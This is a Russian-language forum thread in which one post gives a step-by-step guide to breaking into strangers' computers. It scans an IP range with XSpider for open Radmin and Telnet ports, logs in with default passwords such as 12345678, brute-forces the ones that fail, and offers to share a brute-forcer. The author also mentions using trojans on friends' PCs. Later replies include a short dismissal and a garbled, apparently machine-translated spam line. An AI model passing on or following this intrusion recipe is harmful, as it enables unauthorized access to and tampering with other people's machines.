Для пресс-релизов и новостей news@ci.ru

Знаю как залезть в чужой комп!!!

Предыдущие сообщения

23 декабря 2011

#1сообщение удалено

#2SVEN2 способа проникновения в чужой комп!
Нам будет необходимо:
-Сканер портов (Или сканер безопасности)

-Телнет клиент (Он входит в стандартную комплектацию Windows-a)

-Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже)

Это всё самое необходимое.И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами:

-Через порт радмина (4899 порт)

-Телнет порт (23 порт)

Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них.

Начнём с радмина:

РАДМИН (Radmin):

Я видел видео по проникновению на чужой комп используя
радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и
простой способ ещё раз,так как этот способ входит в мою статью,и может
кто не смотрел видео.

Радмин,порт которого 4899,используеться для удалённого
администрирования,для того чтоб открыть порт радмина,на компе должен
быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв
с открытым 4899 портом.

Я для этого буду использовать сканер уязвимостей XSpider.

Запускаем XSpider,и создаём новый профиль (Профиль-Новый):

-В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке
"NetBIOS",снимаем все галочки,переходим к следующей,Telnet,от туда тоже
снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так
идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем
галки,и не меняем никакие параметры) когда дошли до вкладки "Сканер
Портов",останавлеваемся на этой вкладке,и видим там надпись в низу окна:

Файл портов: default.prf

Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в
верху на запись "Новый",в ещё одном появившемся окошке жмём кнопку
"Выбрать",В появившемся окне,в поле "Коментарий" давайте впишем 4899.В
нижнее поле в том же окне с названием "Добавить прт[ы]:"

Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на
"Сохранить как…",В поле "Имя файла" вписываем 4899,и жмём
"Сохранить".Далее в появившемся списке профилев выбираем наш созданный
"4899" и жмём "Выбрать".Далее в оставшемся окне насройки
профиля,переходим к вкладке NetBIOS,и жмём там "Сохранить как…",пишим
в поле "имя файла" 4899 и жмём "Сохранить".

Уффф…,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ
СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий)
кликаем по нему один раз,и жмём выбрать.

Теперь когда профиль создан и выбран,нужно просканить определённый
диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ
щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и
поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до
79.126.27.255

Жмём в Спайдере "Добавить диапазон",вписываем нужный,и жмём ОК,когда
спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто
допустим мы начали сканить диапазон

79.126.27.0 — 79.126.27.255.

Когда спайдер находит жертву с открытым 4899 портом тот айпи
выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот
просканив этот диапазон я один раз нашел уязвимый комп,это
19.126.27.202.

Теперь берём прогу Radmin Viewer (Не спутайте с Radmin
Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899
портом,выбераем режим подключения,для удобства выберайте
"File-transfer",и подключаемся,Если версия сервера радмина
установленная на компе жертвы ниже 2.2,то попросит только
пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если
не подошел,то тогда придёться использовать брутер,но чаще всего стоит
по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня
есть,если кому надо,то стучите в асю,скину брутер.

Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к
жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким
простым способом мы получили доступ к удалённому компу.

Тепеь давайте рассмотрим взлом через телнет.

Искать компы с открытым 23 портом телнетом можно также как я описывал
во взломе с радмином,только при настройке профиля,указываем 23 порт а
не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту
стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил
брутфорс.Подойдёт BrutusAET2.

Я тут описал только самый простой способ искать телнет порты и
взламывать,может кто то использует и другой,но я описал как этим
пользуюсь я.

Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп.

Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь
трояном.17:47:220

#3сообщение удалено

29 декабря 2011
#4Samar_Obrinэто очень старые методы и касаются только чайников, которые кроме кнопки пуск ничего не знают.
А у чайников на компах ничего интересного нет и не будет. Все твои старания может заблокировать обычный Каспер.18:35:592
3 января 2014

#5сообщение удалено

29 января 2014

#6сообщение удалено

#7сообщение удалено

10 февраля 2014
#8tzubooster1. Google.ru
2. Everything
3. Screw with people06:06:480
#9tzubooster1.

Взлом через TELNET

Google.ru
2. все
3. Винт с людьми06:07:020

Следующие сообщения

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *